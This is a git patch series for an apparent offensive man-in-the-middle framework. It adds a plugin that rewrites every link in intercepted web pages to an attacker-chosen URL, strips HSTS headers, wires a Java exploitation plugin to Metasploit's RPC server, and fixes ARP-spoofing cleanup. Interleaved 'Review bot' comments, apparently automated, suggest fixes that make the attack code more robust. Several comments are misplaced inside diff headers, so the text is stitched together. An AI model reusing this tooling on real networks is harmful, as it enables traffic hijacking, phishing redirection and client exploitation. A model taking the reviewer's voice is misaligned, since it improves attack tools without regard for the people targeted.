From a60a199e59fd84309a2cd257ee3ed9da719201b8 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Fri, 18 Jul 2014 01:27:05 +0200
Subject: [PATCH 1/7] added rpcip argument to javapwn
---
 plugins/JavaPwn.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py
index 8cd61db..7fe4206 100644
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@@ -22,6 +22,7 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.options = options
 self.msfip = options.msfip
 self.msfport = options.msfport
+ self.rpcip = options.rpcip
 if not self.msfip:
 sys.exit('[-] JavaPwn plugin requires --msfip')
@@ -36,7 +37,7 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
 try:
- msf = msfrpc.Msfrpc({}) #create an instance of msfrpc libarary
+ msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary
 msf.login('msf', 'abc123')
 version = msf.call('core.version')['version']
 print "[*] Succesfully connected to Metasploit v%s" % version
@@ -165,6 +166,7 @@ class JavaPwn(BrowserProfiler, Plugin):
 def add_options(self, options):
 options.add_argument('--msfip', dest='msfip', help='IP Address of MSF')
 options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
+ options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
 def finish(self):
 '''This will be called when shutting down'''
From 0148246155088136c309365dfa7d7f9cc555cb40 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Fri, 18 Jul 2014 01:32:34 +0200
Subject: [PATCH 2/7] updated javapwns shutdown function
---
 plugins/JavaPwn.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py
index 7fe4206..f89a9d6 100644
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
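Review bot: The help text for `--rpcip` in the add_options hunk (@@ -165,6 +166,7 @@) says `[default: localhost]` while the argument's actual default is `'127.0.0.1'`; on a dual-stack host those are not the same address, so the text should state the literal default: `help='IP of MSF MSGRPC server [default: 127.0.0.1]'`. Once rpcip can point off-host, the `msf.login('msf', 'abc123')` call in the second hunk sends the RPC credentials over whatever transport msfrpc.Msfrpc uses; if that transport is plain HTTP (not visible here), a non-loopback rpcip puts the password on the wire, which is worth saying in the help text. Both add_options and the initialize body these hunks belong to continue outside the hunks.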
@@ -170,7 +170,7 @@ class JavaPwn(BrowserProfiler, Plugin):
 def finish(self):
 '''This will be called when shutting down'''
- msf = msfrpc.Msfrpc({})
+ msf = msfrpc.Msfrpc({"host": self.rpcip})
 msf.login('msf', 'abc123')
 jobs = msf.call('job.list')
 if len(jobs) > 0:
From 05f6762b5e4db7e145e234ef9b9b8014d1f6d492 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Fri, 18 Jul 2014 04:04:44 +0200
Subject: [PATCH 3/7] updated readme
---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 053419c..03b7bc1 100644
--- a/README.md
+++ b/README.md
@@ -17,8 +17,8 @@ So far the most significant changes have been:
 - Addition of the JsKeylogger plugin
-- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory
-https://github.com/secretsquirrel/the-backdoor-factory
+- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory
+https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy https://github.com/secretsquirrel/BDFProxy
 - Added msfrpc.py for interfacing with Metasploits rpc server
From e83aaa164056ec36c6ef8680a4ad5d2b5550917b Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Fri, 18 Jul 2014 04:41:07 +0200
Subject: [PATCH 4/7] added link re-writer plugin
---
 plugins/Linkrewriter.py | 48 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 plugins/Linkrewriter.py
diff --git a/plugins/Linkrewriter.py b/plugins/Linkrewriter.py
new file mode 100644
index 0000000..5e87801
--- /dev/null
+++ b/plugins/Linkrewriter.py
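Review bot: `finish` in the @@ -170,7 +170,7 @@ hunk opens a fresh `msfrpc.Msfrpc` connection and logs in with no exception handling, so if the MSGRPC server is already gone at shutdown the unhandled exception aborts the rest of the shutdown path (the job-stopping code continues outside the hunk). initialize wraps the same two calls in try/except; mirroring that here, e.g. a `try:` around the `Msfrpc`/`login` lines with `except Exception as e: print '[-] Could not reach the MSF MSGRPC server during shutdown: %s' % e` followed by `return`, keeps shutdown best-effort. The same finish body reappears with this gap in patch 6's @@ -167,11 +168,12 @@ hunk.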
@@ -0,0 +1,48 @@
+#There probably is a better way of doing this
+
+import logging, re, sys, os
+from plugins.plugin import Plugin
+
+class LinkRw(Plugin):
+ name = "Link Re-Writer"
+ optname = "linkrw"
+ implements = ["handleResponse"]
+ has_opts = True
+ desc = "Rewrites all href attributes to a specified url"
+
+ def initialize(self, options):
+ '''Called if plugin is enabled, passed the options namespace'''
+ self.options = options
+ self.url = options.url
+
+ self.mime = "text/html"
+
+ print "[*] Link Re-Writer plugin online"
+
+
+ def handleResponse(self, request, data):
+ ip,hn,mime = self._get_req_info(request)
+ if mime.find(self.mime)!=-1:
+
+ data = self.repl_hrefs(data)
+ logging.info("%s [%s] Re-wrote hrefs" % (request.client.getClientIP(), request.headers['host']))
+ return {'request':request,'data':data}
+ else:
+ return
+
+ def add_options(self, options):
+ options.add_argument("--url", type=str, help="URL to re-write")
+
+ def _get_req_info(self, request):
+ ip = request.client.getClientIP()
+ hn = request.client.getRequestHostname()
+ mime = request.client.headers['Content-Type']
+ return (ip,hn,mime)
+
+ def repl_hrefs(self, data):
+
+ regex = [re.compile(r"href=[\'\"]http[s]?://.+[\'\"]", re.I)]
+
+ for i,r in enumerate(regex):
+ data=re.sub(r, "href=" + self.url, data)
+ return data
From bf4506a98a88d8ef88fcab37eb166843cfe977e4 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Fri, 18 Jul 2014 04:45:43 +0200
Subject: [PATCH 5/7] updated readme with new plugin
---
 README.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 03b7bc1..7410173 100644
--- a/README.md
+++ b/README.md
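Review bot: `_get_req_info` indexes `request.client.headers['Content-Type']`, which raises KeyError for any response that lacks that header and takes the handler down with it; `request.client.headers.get('Content-Type', '')` keeps the following `mime.find(self.mime)` check working on an empty string. `--url` has no default, so `self.url` is None when the option is omitted and `"href=" + self.url` in `repl_hrefs` fails with TypeError on the first HTML response — initialize should reject that up front the way JavaPwn rejects a missing `--msfip`: `if not self.url: sys.exit('[-] Link Re-Writer plugin requires --url')`. Smaller points: the loop index `i` in `repl_hrefs` is never used (`for r in regex:` suffices), and `os` is imported but not referenced.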
@@ -22,6 +22,8 @@ https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy ht
 - Added msfrpc.py for interfacing with Metasploits rpc server
+- Added Link Re-Writer plugin
+
 - Addition of the app-cache poisoning attack by Krzysztof Kotowicz
 - JavaPwn plugin now live! Auto-detect and exploit clients with out-of-date java plugins using the Metasploit Frameworks rpc interface!!
From 5a5a3e36ec4ddcebd7df04c7562a62583264c706 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Fri, 18 Jul 2014 11:08:50 +0200
Subject: [PATCH 6/7] made rpc pass configurable
---
 plugins/JavaPwn.py | 8 +++++---
 plugins/Linkrewriter.py | 2 +-
 sslstrip/ClientRequest.py | 3 +++
 3 files changed, 9 insertions(+), 4 deletions(-)
diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py
index f89a9d6..18d7a16 100644
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@@ -23,6 +23,7 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.msfip = options.msfip
 self.msfport = options.msfport
 self.rpcip = options.rpcip
+ self.rpcpass = options.rpcpass
 if not self.msfip:
 sys.exit('[-] JavaPwn plugin requires --msfip')
@@ -38,11 +39,11 @@ class JavaPwn(BrowserProfiler, Plugin):
 try:
 msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary
- msf.login('msf', 'abc123')
+ msf.login('msf', self.rpcpass)
 version = msf.call('core.version')['version']
 print "[*] Succesfully connected to Metasploit v%s" % version
 except:
- sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and ran 'load msgrpc Pass=abc123'")
+ sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
 #Initialize the BrowserProfiler plugin
 BrowserProfiler.initialize(self, options)
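Review bot: The new `sys.exit("[-] Error connecting to MSF! ...")` in the @@ -38,11 +39,11 @@ hunk discards the exception, and the surrounding bare `except:` also catches SystemExit and KeyboardInterrupt, so a wrong `--rpcpass`, an unreachable `--rpcip` and a Ctrl-C during login all collapse into the same generic message. Binding and narrowing the clause makes a misconfiguration diagnosable: `except Exception as e:` and `sys.exit("[-] Error connecting to MSF (%s)! Make sure you started Metasploit and its MSGRPC server" % e)`. The enclosing initialize method starts before this hunk.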
@@ -167,11 +168,12 @@ class JavaPwn(BrowserProfiler, Plugin):
 options.add_argument('--msfip', dest='msfip', help='IP Address of MSF')
 options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
 options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
+ options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
 def finish(self):
 '''This will be called when shutting down'''
 msf = msfrpc.Msfrpc({"host": self.rpcip})
- msf.login('msf', 'abc123')
+ msf.login('msf', self.rpcpass)
 jobs = msf.call('job.list')
 if len(jobs) > 0:
 print '[*] Stopping all running metasploit jobs'
diff --git a/plugins/Linkrewriter.py b/plugins/Linkrewriter.py
index 5e87801..9582790 100644
--- a/plugins/Linkrewriter.py
+++ b/plugins/Linkrewriter.py
@@ -1,4 +1,4 @@
-#There probably is a better way of doing this
+#probably a better way of doing this
 import logging, re, sys, os
 from plugins.plugin import Plugin
diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py
index 6896cc3..5dfad7f 100644
--- a/sslstrip/ClientRequest.py
+++ b/sslstrip/ClientRequest.py
@@ -56,6 +56,9 @@ class ClientRequest(Request):
 if 'accept-encoding' in headers:
 headers['accept-encoding'] == 'identity'
+ if 'Strict-Transport-Security' in headers: #kill new hsts requests
+ del headers['Strict-Transport-Security']
+
 if 'if-modified-since' in headers:
 del headers['if-modified-since']
From 8c4d55b01b51ded388a403697c8ea91d985f1df7 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Fri, 18 Jul 2014 11:34:08 +0200
Subject: [PATCH 7/7] fixed rearping error
---
 plugins/ArpSpoof.py | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/plugins/ArpSpoof.py b/plugins/ArpSpoof.py
index 4059f04..1eb5dd7 100644
--- a/plugins/ArpSpoof.py
+++ b/plugins/ArpSpoof.py
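Review bot: `--rpcpass` in the @@ -167,11 +168,12 @@ hunk ships with a default credential of `'abc123'` and repeats it in the help string, so the newly configurable password still falls back to a well-known value, and a value passed on the command line is visible in process listings and shell history. Dropping the default (`options.add_argument('--rpcpass', dest='rpcpass', help='Password for the MSF MSGRPC server')`) and adding `if not self.rpcpass: sys.exit('[-] JavaPwn plugin requires --rpcpass')` next to the existing `--msfip` check in initialize, or reading the value from an environment variable, avoids both. The finish method defined in this hunk continues outside it.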
@@ -18,6 +18,7 @@ class ArpSpoof(Plugin):
 self.options = options
 self.interface = options.interface
 self.routerip = options.routerip
+ self.routermac = getmacbyip(self.routerip)
 self.summary = options.summary
 self.target = options.target
 self.mode = options.mode
@@ -30,7 +31,7 @@ class ArpSpoof(Plugin):
 if os.geteuid() != 0:
 sys.exit("[-] %s plugin requires root privileges" % self.name)
- if self.interface == None or self.routerip == None:
+ if (not self.interface or not self.routerip):
 sys.exit("[-] %s plugin requires --routerip and --interface" % self.name)
 if self.options.log_level == 'debug':
@@ -107,7 +108,5 @@ class ArpSpoof(Plugin):
 file.close()
 os.system('iptables -t nat -F && iptables -t nat -X')
 print '[*] Re-arping network'
- rearp_mac = getmacbyip(self.routerip)
- pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.mac, op=2)
- sendp(pkt, inter=1, count=5, iface=self.interface)
- sys.exit(0)
\ No newline at end of file
+ pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.routermac, op=2)
+ sendp(pkt, inter=1, count=5, iface=self.interface)
\ No newline at end of file
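Review bot: `self.routermac = getmacbyip(self.routerip)` in the @@ -18,6 +18,7 @@ hunk runs before the root check and before the `not self.routerip` validation in the next hunk, so a missing `--routerip` now fails inside scapy instead of with the plugin's own message, and a lookup that gets no ARP reply (scapy returns None in that case) is only noticed much later as an invalid `Ether(src=None, ...)` in the @@ -107,7 +108,5 @@ hunk. Move the lookup below the validation block and check its result: `self.routermac = getmacbyip(self.routerip)` followed by `if self.routermac is None: sys.exit("[-] %s could not resolve the MAC address of %s" % (self.name, self.routerip))`. The parentheses in `if (not self.interface or not self.routerip):` are redundant in Python. initialize continues outside these hunks.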